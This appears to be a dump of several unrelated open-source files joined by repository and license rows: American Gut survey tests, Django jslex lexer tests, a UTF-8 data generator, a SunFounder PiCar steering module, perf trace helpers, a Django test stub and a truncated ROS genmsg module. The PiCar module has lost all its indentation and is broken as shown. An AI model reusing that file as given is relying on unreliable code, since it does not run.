from amgut.lib.data_access.ag_data_access import AGDataAccess
class TestUtil(TestCase):
    """Tests for the secondary-survey helper functions in amgut.lib.util.

    The expected HTML below mirrors the production templates verbatim,
    including their existing typos ("onging", "drive") -- do not "fix" the
    strings here without changing the production text first.
    """

    def setUp(self):
        self.ag_data = AGDataAccess()

    def tearDown(self):
        del self.ag_data

    def test_survey_fermented(self):
        obs = survey_fermented('survey_id', {'participant_name': 'test'})
        exp = ('<h3 style="text-align: center"><a href="/authed/'
               'secondary_survey/?type=fermented&participant_name=test" '
               'target="_blank">Fermented Foods Survey</a></h3>As part of our '
               'onging research into what drive changes in the human gut '
               'microbiome, we are looking at fermented foods and the '
               'microbiomes of fermented food eaters. Please click the link '
               'above if you would like to participate in this survey.')
        self.assertEqual(obs, exp)

    def test_survey_surf(self):
        obs = survey_surf('survey_id', {'participant_name': 'test'})
        exp = ('<h3 style="text-align: center"><a href="/authed/'
               'secondary_survey/?type=surf&participant_name=test" target='
               '"_blank">Surfing Survey</a></h3>As part of our study, we are '
               'interested in the effects of frequent and prolonged exposure '
               'to salt water and the ocean, as it pertains to surfing and '
               'surfers. If you are interested in participating, you can click'
               ' the link above and take the survey.')
        self.assertEqual(obs, exp)

    def test_survey_asd(self):
        obs = survey_asd('survey_id', {'participant_name': 'test'})
        exp = ('<h3 style="text-align: center"><a href="https://docs.google.'
               'com/forms/d/1ZlaQzENj7NA7TcdfFhXfW0jshrToTywAarV0fjTZQxc/'
               'viewform?entry.1089722816=survey_id&entry.1116725993&entry.'
               '1983725631&entry.2036966278&entry.1785627282&entry.1461731626'
               '&entry.1203990558&entry.843049551&entry.476318397&entry.'
               '383297943&entry.228366248&entry.1651855735&entry.1234457826&'
               'entry.1079752165" target="_blank">ASD-Cohort survey</a></h3>'
               '<a href="http://www.anl.gov/contributors/jack-gilbert">Dr. '
               'Jack Gilbert</a> is exploring the relationship between gut '
               'dysbiosis and Autism Spectrum Disorders, and in conjunction '
               'with the American Gut Project, we started an ASD-Cohort '
               'study. This additional survey contains questions specific to '
               'that cohort, but it is open to any participant to take if '
               'they so choose.')
        self.assertEqual(obs, exp)

    def test_survey_vioscreen(self):
        obs = survey_vioscreen('survey_id', {'participant_name': 'test'})
        # Validate using in because key changes every time due to encription
        self.assertIn('This is a validated FFQ, and is the one used '
                      'by the Mayo Clinic.', obs)
        self.assertIn('<h3 style="text-align: center"><a href="'
                      'https://vioscreen.com/remotelogin.aspx?Key=', obs)

    # NOTE(review): method name has a typo ("rolback") but is still
    # discovered by unittest; renaming it is a behaviour-neutral cleanup for
    # a separate change.
    def test_rolback(self):
        kit = 'tst_QCSKc'

        # The @rollback decorator must undo any database writes performed
        # inside the wrapped function.
        @rollback
        def tf(kit):
            self.ag_data.verifyKit(kit)

        # Kit starts unverified, and must remain unverified after tf() runs,
        # because rollback reverts the verifyKit() write.
        obs = self.ag_data.getAGKitDetails(kit)
        self.assertEqual(obs['kit_verified'], 'n')
        tf(kit)
        obs = self.ag_data.getAGKitDetails(kit)
        self.assertEqual(obs['kit_verified'], 'n')
# Allow running this test module directly.
if __name__ == '__main__':
    main()
| bsd-3-clause |
zhoulingjun/django | tests/utils_tests/test_jslex.py | 169 | 9708 | # -*- coding: utf-8 -*-
"""Tests for jslex."""
# originally from https://bitbucket.org/ned/jslex
from __future__ import unicode_literals
from django.test import SimpleTestCase
from django.utils.jslex import JsLexer, prepare_js_for_gettext
class JsTokensTest(SimpleTestCase):
    # Each LEX_CASES entry pairs a JavaScript snippet with the expected list
    # of "<token-name> <token-text>" strings; whitespace tokens are filtered
    # out by the dynamically generated test methods attached below the class.
    LEX_CASES = [
        # ids
        ("a ABC $ _ a123", ["id a", "id ABC", "id $", "id _", "id a123"]),
        ("\\u1234 abc\\u0020 \\u0065_\\u0067", ["id \\u1234", "id abc\\u0020", "id \\u0065_\\u0067"]),

        # numbers
        ("123 1.234 0.123e-3 0 1E+40 1e1 .123", ["dnum 123", "dnum 1.234", "dnum 0.123e-3", "dnum 0", "dnum 1E+40", "dnum 1e1", "dnum .123"]),
        ("0x1 0xabCD 0XABcd", ["hnum 0x1", "hnum 0xabCD", "hnum 0XABcd"]),
        ("010 0377 090", ["onum 010", "onum 0377", "dnum 0", "dnum 90"]),
        ("0xa123ghi", ["hnum 0xa123", "id ghi"]),

        # keywords
        ("function Function FUNCTION", ["keyword function", "id Function", "id FUNCTION"]),
        ("const constructor in inherits", ["keyword const", "id constructor", "keyword in", "id inherits"]),
        ("true true_enough", ["reserved true", "id true_enough"]),

        # strings
        (''' 'hello' "hello" ''', ["string 'hello'", 'string "hello"']),
        (r""" 'don\'t' "don\"t" '"' "'" '\'' "\"" """,
         [r"""string 'don\'t'""", r'''string "don\"t"''', r"""string '"'""", r'''string "'"''', r"""string '\''""", r'''string "\""''']),
        (r'"ƃuıxǝ⅂ ʇdıɹɔsɐʌɐſ\""', [r'string "ƃuıxǝ⅂ ʇdıɹɔsɐʌɐſ\""']),

        # comments
        ("a//b", ["id a", "linecomment //b"]),
        ("/****/a/=2//hello", ["comment /****/", "id a", "punct /=", "dnum 2", "linecomment //hello"]),
        ("/*\n * Header\n */\na=1;", ["comment /*\n * Header\n */", "id a", "punct =", "dnum 1", "punct ;"]),

        # punctuation
        ("a+++b", ["id a", "punct ++", "punct +", "id b"]),

        # regex
        (r"a=/a*/,1", ["id a", "punct =", "regex /a*/", "punct ,", "dnum 1"]),
        (r"a=/a*[^/]+/,1", ["id a", "punct =", "regex /a*[^/]+/", "punct ,", "dnum 1"]),
        (r"a=/a*\[^/,1", ["id a", "punct =", r"regex /a*\[^/", "punct ,", "dnum 1"]),
        (r"a=/\//,1", ["id a", "punct =", r"regex /\//", "punct ,", "dnum 1"]),

        # next two are from http://www.mozilla.org/js/language/js20-2002-04/rationale/syntax.html#regular-expressions
        ("""for (var x = a in foo && "</x>" || mot ? z:/x:3;x<5;y</g/i) {xyz(x++);}""",
         ["keyword for", "punct (", "keyword var", "id x", "punct =", "id a", "keyword in",
          "id foo", "punct &&", 'string "</x>"', "punct ||", "id mot", "punct ?", "id z",
          "punct :", "regex /x:3;x<5;y</g", "punct /", "id i", "punct )", "punct {",
          "id xyz", "punct (", "id x", "punct ++", "punct )", "punct ;", "punct }"]),
        ("""for (var x = a in foo && "</x>" || mot ? z/x:3;x<5;y</g/i) {xyz(x++);}""",
         ["keyword for", "punct (", "keyword var", "id x", "punct =", "id a", "keyword in",
          "id foo", "punct &&", 'string "</x>"', "punct ||", "id mot", "punct ?", "id z",
          "punct /", "id x", "punct :", "dnum 3", "punct ;", "id x", "punct <", "dnum 5",
          "punct ;", "id y", "punct <", "regex /g/i", "punct )", "punct {",
          "id xyz", "punct (", "id x", "punct ++", "punct )", "punct ;", "punct }"]),

        # Various "illegal" regexes that are valid according to the std.
        (r"""/????/, /++++/, /[----]/ """, ["regex /????/", "punct ,", "regex /++++/", "punct ,", "regex /[----]/"]),

        # Stress cases from http://stackoverflow.com/questions/5533925/what-javascript-constructs-does-jslex-incorrectly-lex/5573409#5573409
        (r"""/\[/""", [r"""regex /\[/"""]),
        (r"""/[i]/""", [r"""regex /[i]/"""]),
        (r"""/[\]]/""", [r"""regex /[\]]/"""]),
        (r"""/a[\]]/""", [r"""regex /a[\]]/"""]),
        (r"""/a[\]]b/""", [r"""regex /a[\]]b/"""]),
        (r"""/[\]/]/gi""", [r"""regex /[\]/]/gi"""]),
        (r"""/\[[^\]]+\]/gi""", [r"""regex /\[[^\]]+\]/gi"""]),
        ("""
rexl.re = {
NAME: /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/,
UNQUOTED_LITERAL: /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/,
QUOTED_LITERAL: /^'(?:[^']|'')*'/,
NUMERIC_LITERAL: /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/,
SYMBOL: /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/
};
""",
         ["id rexl", "punct .", "id re", "punct =", "punct {",
          "id NAME", "punct :", r"""regex /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/""", "punct ,",
          "id UNQUOTED_LITERAL", "punct :", r"""regex /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/""", "punct ,",
          "id QUOTED_LITERAL", "punct :", r"""regex /^'(?:[^']|'')*'/""", "punct ,",
          "id NUMERIC_LITERAL", "punct :", r"""regex /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/""", "punct ,",
          "id SYMBOL", "punct :", r"""regex /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/""",
          "punct }", "punct ;"
          ]),
        ("""
rexl.re = {
NAME: /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/,
UNQUOTED_LITERAL: /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/,
QUOTED_LITERAL: /^'(?:[^']|'')*'/,
NUMERIC_LITERAL: /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/,
SYMBOL: /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/
};
str = '"';
""",
         ["id rexl", "punct .", "id re", "punct =", "punct {",
          "id NAME", "punct :", r"""regex /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/""", "punct ,",
          "id UNQUOTED_LITERAL", "punct :", r"""regex /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/""", "punct ,",
          "id QUOTED_LITERAL", "punct :", r"""regex /^'(?:[^']|'')*'/""", "punct ,",
          "id NUMERIC_LITERAL", "punct :", r"""regex /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/""", "punct ,",
          "id SYMBOL", "punct :", r"""regex /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/""",
          "punct }", "punct ;",
          "id str", "punct =", """string '"'""", "punct ;",
          ]),
        (r""" this._js = "e.str(\"" + this.value.replace(/\\/g, "\\\\").replace(/"/g, "\\\"") + "\")"; """,
         ["keyword this", "punct .", "id _js", "punct =", r'''string "e.str(\""''', "punct +", "keyword this", "punct .",
          "id value", "punct .", "id replace", "punct (", r"regex /\\/g", "punct ,", r'string "\\\\"', "punct )",
          "punct .", "id replace", "punct (", r'regex /"/g', "punct ,", r'string "\\\""', "punct )", "punct +",
          r'string "\")"', "punct ;"]),
    ]
def make_function(input, toks):
    """Build a test method asserting that lexing *input* yields exactly *toks*.

    Whitespace tokens are dropped before comparison; every other token is
    rendered as "<name> <text>".
    """
    def test_func(self):
        actual = [
            "%s %s" % (kind, text)
            for kind, text in JsLexer().lex(input)
            if kind != 'ws'
        ]
        self.assertListEqual(actual, toks)
    return test_func
# Dynamically attach one test method per LEX_CASES entry so each case is
# reported individually by the test runner.
for i, (input, toks) in enumerate(JsTokensTest.LEX_CASES):
    setattr(JsTokensTest, "test_case_%d" % i, make_function(input, toks))
# (javascript_source, expected_output) pairs for prepare_js_for_gettext:
# regex literals become the placeholder string "REGEX", single-quoted strings
# are rewritten with double quotes, and comments pass through untouched.
GETTEXT_CASES = (
    (
        r"""
a = 1; /* /[0-9]+/ */
b = 0x2a0b / 1; // /[0-9]+/
c = 3;
""",
        r"""
a = 1; /* /[0-9]+/ */
b = 0x2a0b / 1; // /[0-9]+/
c = 3;
"""
    ), (
        r"""
a = 1.234e-5;
/*
* /[0-9+/
*/
b = .0123;
""",
        r"""
a = 1.234e-5;
/*
* /[0-9+/
*/
b = .0123;
"""
    ), (
        r"""
x = y / z;
alert(gettext("hello"));
x /= 3;
""",
        r"""
x = y / z;
alert(gettext("hello"));
x /= 3;
"""
    ), (
        r"""
s = "Hello \"th/foo/ere\"";
s = 'He\x23llo \'th/foo/ere\'';
s = 'slash quote \", just quote "';
""",
        r"""
s = "Hello \"th/foo/ere\"";
s = "He\x23llo \'th/foo/ere\'";
s = "slash quote \", just quote \"";
"""
    ), (
        r"""
s = "Line continuation\
continued /hello/ still the string";/hello/;
""",
        r"""
s = "Line continuation\
continued /hello/ still the string";"REGEX";
"""
    ), (
        r"""
var regex = /pattern/;
var regex2 = /matter/gm;
var regex3 = /[*/]+/gm.foo("hey");
""",
        r"""
var regex = "REGEX";
var regex2 = "REGEX";
var regex3 = "REGEX".foo("hey");
"""
    ), (
        r"""
for (var x = a in foo && "</x>" || mot ? z:/x:3;x<5;y</g/i) {xyz(x++);}
for (var x = a in foo && "</x>" || mot ? z/x:3;x<5;y</g/i) {xyz(x++);}
""",
        r"""
for (var x = a in foo && "</x>" || mot ? z:"REGEX"/i) {xyz(x++);}
for (var x = a in foo && "</x>" || mot ? z/x:3;x<5;y<"REGEX") {xyz(x++);}
"""
    ), (
        """
\\u1234xyz = gettext('Hello there');
""", r"""
Uu1234xyz = gettext("Hello there");
"""
    )
)
class JsToCForGettextTest(SimpleTestCase):
    # Test methods are attached dynamically below, one per GETTEXT_CASES pair.
    pass
def make_function(js, c):
    """Build a test method asserting that prepare_js_for_gettext(*js*) == *c*."""
    def test_func(self):
        converted = prepare_js_for_gettext(js)
        self.assertMultiLineEqual(converted, c)
    return test_func
# Dynamically attach one test method per GETTEXT_CASES pair.
for i, pair in enumerate(GETTEXT_CASES):
    setattr(JsToCForGettextTest, "test_case_%d" % i, make_function(*pair))
| bsd-3-clause |
yashoswal/Node-HTTP-proxy-server | node_modules/socket.io/node_modules/socket.io-client/node_modules/engine.io-client/node_modules/engine.io-parser/node_modules/utf8/tests/generate-test-data.py | 2214 | 1347 | #!/usr/bin/env python
import re
import json
# http://mathiasbynens.be/notes/javascript-encoding#surrogate-formulae
# http://stackoverflow.com/a/13436167/96656
def unisymbol(codePoint):
    """Return the unicode string for *codePoint* (Python 2).

    BMP code points map straight through unichr(); supplementary-plane code
    points are encoded as a UTF-16 surrogate pair; anything outside the
    Unicode range yields the literal string 'Error'.
    """
    if 0x0000 <= codePoint <= 0xFFFF:
        return unichr(codePoint)
    if 0x010000 <= codePoint <= 0x10FFFF:
        # Surrogate formulae: http://mathiasbynens.be/notes/javascript-encoding
        high, low = divmod(codePoint - 0x10000, 0x400)
        return unichr(0xD800 + high) + unichr(0xDC00 + low)
    return 'Error'
def hexify(codePoint):
    """Format a code point as a zero-padded, uppercase 'U+XXXXXX' string."""
    return 'U+%06X' % codePoint
def writeFile(filename, contents):
    # Echo the file name (Python 2 print statement), then write the contents
    # with surrounding whitespace normalized to a single trailing newline.
    print filename
    with open(filename, 'w') as f:
        f.write(contents.strip() + '\n')
# Build one record per Unicode code point: the numeric code point, its
# decoded symbol, and its UTF-8 byte sequence re-decoded as latin1 so that
# each byte maps to exactly one character in the JSON output.
data = []
for codePoint in range(0x000000, 0x10FFFF + 1):
    symbol = unisymbol(codePoint)
    # http://stackoverflow.com/a/17199950/96656
    bytes = symbol.encode('utf8').decode('latin1')
    data.append({
        'codePoint': codePoint,
        'decoded': symbol,
        'encoded': bytes
    });
jsonData = json.dumps(data, sort_keys=False, indent=2, separators=(',', ': '))
# Use tabs instead of double spaces for indentation
jsonData = jsonData.replace('  ', '\t')
# Escape hexadecimal digits in escape sequences
jsonData = re.sub(
    r'\\u([a-fA-F0-9]{4})',
    lambda match: r'\u{}'.format(match.group(1).upper()),
    jsonData
)
writeFile('data.json', jsonData)
| mit |
sunfounder/SunFounder_PiCar | picar/front_wheels.py | 1 | 5167 | #!/usr/bin/env python
'''
**********************************************************************
* Filename : front_wheels
* Description : A module to control the front wheels of RPi Car
* Author : Cavon
* Brand : SunFounder
* E-mail : service@sunfounder.com
* Website : www.sunfounder.com
* Update : Cavon 2016-09-13 New release
* Cavon 2016-11-04 fix for submodules
**********************************************************************
'''
from .SunFounder_PCA9685 import Servo
from .import filedb
class Front_Wheels(object):
''' Front wheels control class '''
FRONT_WHEEL_CHANNEL = 0
_DEBUG = False
_DEBUG_INFO = 'DEBUG "front_wheels.py":'
def __init__(self, debug=False, db="config", bus_number=1, channel=FRONT_WHEEL_CHANNEL):
''' setup channels and basic stuff '''
self.db = filedb.fileDB(db=db)
self._channel = channel
self._straight_angle = 90
self.turning_max = 45
self._turning_offset = int(self.db.get('turning_offset', default_value=0))
self.wheel = Servo.Servo(self._channel, bus_number=bus_number, offset=self.turning_offset)
self.debug = debug
self._debug_('Front wheel PWM channel: %s' % self._channel)
self._debug_('Front wheel offset value: %s ' % self.turning_offset)
self._angle = {"left":self._min_angle, "straight":self._straight_angle, "right":self._max_angle}
self._debug_('left angle: %s, straight angle: %s, right angle: %s' % (self._angle["left"], self._angle["straight"], self._angle["right"]))
def _debug_(self,message):
if self._DEBUG:
print(self._DEBUG_INFO,message)
def turn_left(self):
''' Turn the front wheels left '''
self._debug_("Turn left")
self.wheel.write(self._angle["left"])
def turn_straight(self):
''' Turn the front wheels back straight '''
self._debug_("Turn straight")
self.wheel.write(self._angle["straight"])
def turn_right(self):
''' Turn the front wheels right '''
self._debug_("Turn right")
self.wheel.write(self._angle["right"])
def turn(self, angle):
''' Turn the front wheels to the giving angle '''
self._debug_("Turn to %s " % angle)
if angle < self._angle["left"]:
angle = self._angle["left"]
if angle > self._angle["right"]:
angle = self._angle["right"]
self.wheel.write(angle)
@property
def channel(self):
return self._channel
@channel.setter
def channel(self, chn):
self._channel = chn
@property
def turning_max(self):
return self._turning_max
@turning_max.setter
def turning_max(self, angle):
self._turning_max = angle
self._min_angle = self._straight_angle - angle
self._max_angle = self._straight_angle + angle
self._angle = {"left":self._min_angle, "straight":self._straight_angle, "right":self._max_angle}
@property
def turning_offset(self):
return self._turning_offset
@turning_offset.setter
def turning_offset(self, value):
if not isinstance(value, int):
raise TypeError('"turning_offset" must be "int"')
self._turning_offset = value
self.db.set('turning_offset', value)
self.wheel.offset = value
self.turn_straight()
@property
def debug(self):
return self._DEBUG
@debug.setter
def debug(self, debug):
''' Set if debug information shows '''
if debug in (True, False):
self._DEBUG = debug
else:
raise ValueError('debug must be "True" (Set debug on) or "False" (Set debug off), not "{0}"'.format(debug))
if self._DEBUG:
print(self._DEBUG_INFO, "Set debug on")
print(self._DEBUG_INFO, "Set wheel debug on")
self.wheel.debug = True
else:
print(self._DEBUG_INFO, "Set debug off")
print(self._DEBUG_INFO, "Set wheel debug off")
self.wheel.debug = False
def ready(self):
''' Get the front wheels to the ready position. '''
self._debug_('Turn to "Ready" position')
self.wheel.offset = self.turning_offset
self.turn_straight()
def calibration(self):
''' Get the front wheels to the calibration position. '''
self._debug_('Turn to "Calibration" position')
self.turn_straight()
self.cali_turning_offset = self.turning_offset
def cali_left(self):
''' Calibrate the wheels to left '''
self.cali_turning_offset -= 1
self.wheel.offset = self.cali_turning_offset
self.turn_straight()
def cali_right(self):
''' Calibrate the wheels to right '''
self.cali_turning_offset += 1
self.wheel.offset = self.cali_turning_offset
self.turn_straight()
def cali_ok(self):
    ''' Save the calibration value '''
    self.turning_offset = self.cali_turning_offset
    # NOTE(review): the turning_offset setter already persists the value via
    # self.db.set, so this second write is redundant (but harmless).
    self.db.set('turning_offset', self.turning_offset)
def test(chn=0):
    '''Manual smoke test: sweep left / straight / right / straight forever.

    Runs until interrupted with Ctrl-C, then re-centers the wheels.
    '''
    import time
    front_wheels = Front_Wheels(channel=chn)
    sweep = (
        ("turn_left", front_wheels.turn_left),
        ("turn_straight", front_wheels.turn_straight),
        ("turn_right", front_wheels.turn_right),
        ("turn_straight", front_wheels.turn_straight),
    )
    try:
        while True:
            for label, move in sweep:
                print(label)
                move()
                time.sleep(1)
    except KeyboardInterrupt:
        front_wheels.turn_straight()
# Allow running this module directly as a manual hardware smoke test.
if __name__ == '__main__':
    test()
| gpl-2.0 |
thewisenerd/android_kernel_xiaomi_armani | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Core.py | 11088 | 3246 | # Core.py - Python extension for perf script, core functions
#
# Copyright (C) 2010 by Tom Zanussi <tzanussi@gmail.com>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
from collections import defaultdict
def autodict():
    """Return a dict that auto-creates nested dicts on missing-key access."""
    return defaultdict(autodict)
# Per-event tables describing how to pretty-print trace fields:
#   flag_fields[event][field] -> {'delim': str, 'values': {bit: name}}
#   symbolic_fields[event][field] -> {'values': {value: name}}
flag_fields = autodict()
symbolic_fields = autodict()
def define_flag_field(event_name, field_name, delim):
    # Record the delimiter printed between flag names for this field.
    flag_fields[event_name][field_name]['delim'] = delim
def define_flag_value(event_name, field_name, value, field_str):
    # Map one flag bit value to its human-readable name.
    flag_fields[event_name][field_name]['values'][value] = field_str
def define_symbolic_field(event_name, field_name):
    """No-op kept for API symmetry with define_flag_field."""
    # nothing to do, really
    pass
def define_symbolic_value(event_name, field_name, value, field_str):
    # Map one exact field value to its human-readable name.
    symbolic_fields[event_name][field_name]['values'][value] = field_str
def flag_str(event_name, field_name, value):
    """Render a bitmask field as 'NAME <delim> NAME ...' using the names
    registered via define_flag_value; returns '' if nothing is registered.
    """
    string = ""
    if flag_fields[event_name][field_name]:
        print_delim = 0
        # Fix: the original did `keys = d.keys(); keys.sort()`, which fails
        # on Python 3 where keys() returns a view; sorted() works on both.
        for idx in sorted(flag_fields[event_name][field_name]['values'].keys()):
            if not value and not idx:
                # Value 0 with a registered 0 name (e.g. "NONE").
                string += flag_fields[event_name][field_name]['values'][idx]
                break
            if idx and (value & idx) == idx:
                if print_delim and flag_fields[event_name][field_name]['delim']:
                    string += " " + flag_fields[event_name][field_name]['delim'] + " "
                string += flag_fields[event_name][field_name]['values'][idx]
                print_delim = 1
                # Clear the consumed bit so leftover bits are simply dropped.
                value &= ~idx
    return string
def symbol_str(event_name, field_name, value):
    """Render a field holding a single enumerated value as its registered
    name; returns '' if no name matches.
    """
    string = ""
    if symbolic_fields[event_name][field_name]:
        # Fix: sorted() instead of `keys(); keys.sort()` so this also works
        # on Python 3, where keys() returns a non-sortable view.
        for idx in sorted(symbolic_fields[event_name][field_name]['values'].keys()):
            if not value and not idx:
                string = symbolic_fields[event_name][field_name]['values'][idx]
                break
            if (value == idx):
                string = symbolic_fields[event_name][field_name]['values'][idx]
                break
    return string
# Common ftrace flag bits -> names (0x00 is the "no flags" marker).
trace_flags = {0x00: "NONE",
               0x01: "IRQS_OFF",
               0x02: "IRQS_NOSUPPORT",
               0x04: "NEED_RESCHED",
               0x08: "HARDIRQ",
               0x10: "SOFTIRQ"}

def trace_flag_str(value):
    """Render the trace-flags bitmask as 'A | B | ...' ('NONE' for 0)."""
    string = ""
    print_delim = 0
    # Fix: iterate in sorted key order so the output is deterministic; the
    # original iterated a plain dict, whose order is arbitrary on Python 2.
    for idx in sorted(trace_flags.keys()):
        if not value and not idx:
            string += "NONE"
            break
        if idx and (value & idx) == idx:
            if print_delim:
                string += " | "
            string += trace_flags[idx]
            print_delim = 1
            value &= ~idx
    return string
def taskState(state):
    """Map a scheduler task-state code to its one-letter display name."""
    states = {
        0: "R",
        1: "S",
        2: "D",
        64: "DEAD",
    }
    # dict.get gives the same "Unknown" fallback without an explicit test.
    return states.get(state, "Unknown")
class EventHeaders:
    """Bundle of the common_* header fields every perf trace event carries."""

    def __init__(self, common_cpu, common_secs, common_nsecs,
                 common_pid, common_comm):
        # Tuple assignment keeps the five copies on two lines.
        self.cpu, self.secs, self.nsecs = common_cpu, common_secs, common_nsecs
        self.pid, self.comm = common_pid, common_comm

    def ts(self):
        """Event timestamp in nanoseconds."""
        return (self.secs * (10 ** 9)) + self.nsecs

    def ts_format(self):
        """Timestamp formatted as 'seconds.microseconds'."""
        return "%d.%d" % (self.secs, int(self.nsecs / 1000))
| gpl-2.0 |
XcomConvent/xcom40k-shades | xcom40k/app/tests.py | 1 | 1385 | from django.test import TestCase
# Create your tests here.
import datetime
from django.shortcuts import render, get_object_or_404
from django.template import loader
from django.core.urlresolvers import reverse
from django.views import generic
from django.contrib.auth import views, logout
from django.contrib.auth.models import User, AnonymousUser
from django.contrib.auth.forms import AuthenticationForm
from django.http import HttpResponse, HttpResponseRedirect, Http404, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseServerError
import logging
from django.utils import timezone
from .forms import *
from .models import *
from xcom40k.settings import BUILD_NAME, BUILD_VERSION
from . import models,views,forms,urls
class QuestionViewTests(TestCase):
    """Smoke tests for the app's views; the docstring template below is the
    mandatory format for every test in this suite."""
    # a following sample IS TO BE FOLLOWED STRICTLY:
    # #####
    #def test_<some verbose name> (self):
    #''' COMPONENTS: <name of components being tested>
    # ABOUT: <a broad explanation of the test's purpose>
    # EXPECTED: <an expected result>
    #'''
    # <code>
    # #####
    # The following example should be self-explanatory:
    def test_try_to_ping(self):
        """ COMPONENT: app:*
        ABOUT: Tries to ping up the server.
        EXPECTED: A '200 OK' response should be received from the server
        """
        self.assertEqual(self.client.get(reverse('app:index')).status_code, 200)
| apache-2.0 |
lucasdemarchi/ardupilot | mk/VRBRAIN/Tools/genmsg/src/genmsg/template_tools.py | 51 | 9659 | # Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
## ROS Message generatation
##
##
import sys
import os
import em
import genmsg.command_line
import genmsg.msgs
import genmsg.msg_loader
import genmsg.gentools
# generate msg or srv files from a template file
# template_map of the form { 'template_file':'output_file'} output_file can contain @NAME@ which will be replaced by the message/service name
def _generate_from_spec(input_file, output_dir, template_dir, msg_context, spec, template_map, search_path):
    """Expand every template in template_map for one msg/srv spec.

    template_map maps template filename -> output filename; '@NAME@' in an
    output filename is replaced with the spec's short name.
    """
    md5sum = genmsg.gentools.compute_md5(msg_context, spec)
    # precompute msg definition once
    if isinstance(spec, genmsg.msgs.MsgSpec):
        msg_definition = genmsg.gentools.compute_full_text(msg_context, spec)
    # Loop over all files to generate
    for template_file_name, output_file_name in template_map.items():
        template_file = os.path.join(template_dir, template_file_name)
        output_file = os.path.join(output_dir, output_file_name.replace("@NAME@", spec.short_name))
        #print "generate_from_template %s %s %s" % (input_file, template_file, output_file)
        ofile = open(output_file, 'w') #todo try
        # Set dictionary for the generator interpreter
        g = {
            "file_name_in": input_file,
            "spec": spec,
            "md5sum": md5sum,
            "search_path": search_path,
            "msg_context": msg_context
        }
        if isinstance(spec, genmsg.msgs.MsgSpec):
            g['msg_definition'] = msg_definition
        # todo, reuse interpreter
        interpreter = em.Interpreter(output=ofile, globals=g, options={em.RAW_OPT:True,em.BUFFERED_OPT:True})
        # Template missing: clean up the half-created output before raising.
        if not os.path.isfile(template_file):
            ofile.close()
            os.remove(output_file)
            raise RuntimeError("Template file %s not found in template dir %s" % (template_file_name, template_dir))
        interpreter.file(open(template_file)) #todo try
        # NOTE(review): ofile is not explicitly closed on the success path —
        # presumably em.Interpreter.shutdown() flushes/closes its output;
        # confirm, or wrap in try/finally.
        interpreter.shutdown()
def _generate_msg_from_file(input_file, output_dir, template_dir, search_path, package_name, msg_template_dict):
    """Load one .msg file, resolve its dependencies, and expand templates."""
    # Read MsgSpec from .msg file
    msg_context = genmsg.msg_loader.MsgContext.create_default()
    full_type_name = genmsg.gentools.compute_full_type_name(package_name, os.path.basename(input_file))
    spec = genmsg.msg_loader.load_msg_from_file(msg_context, input_file, full_type_name)
    # Load the dependencies
    genmsg.msg_loader.load_depends(msg_context, spec, search_path)
    # Generate the language dependent msg file
    _generate_from_spec(input_file,
                        output_dir,
                        template_dir,
                        msg_context,
                        spec,
                        msg_template_dict,
                        search_path)
def _generate_srv_from_file(input_file, output_dir, template_dir, search_path, package_name, srv_template_dict, msg_template_dict):
    """Load one .srv file and expand the srv template plus the msg templates
    for its request and response halves."""
    # Read MsgSpec from .srv.file
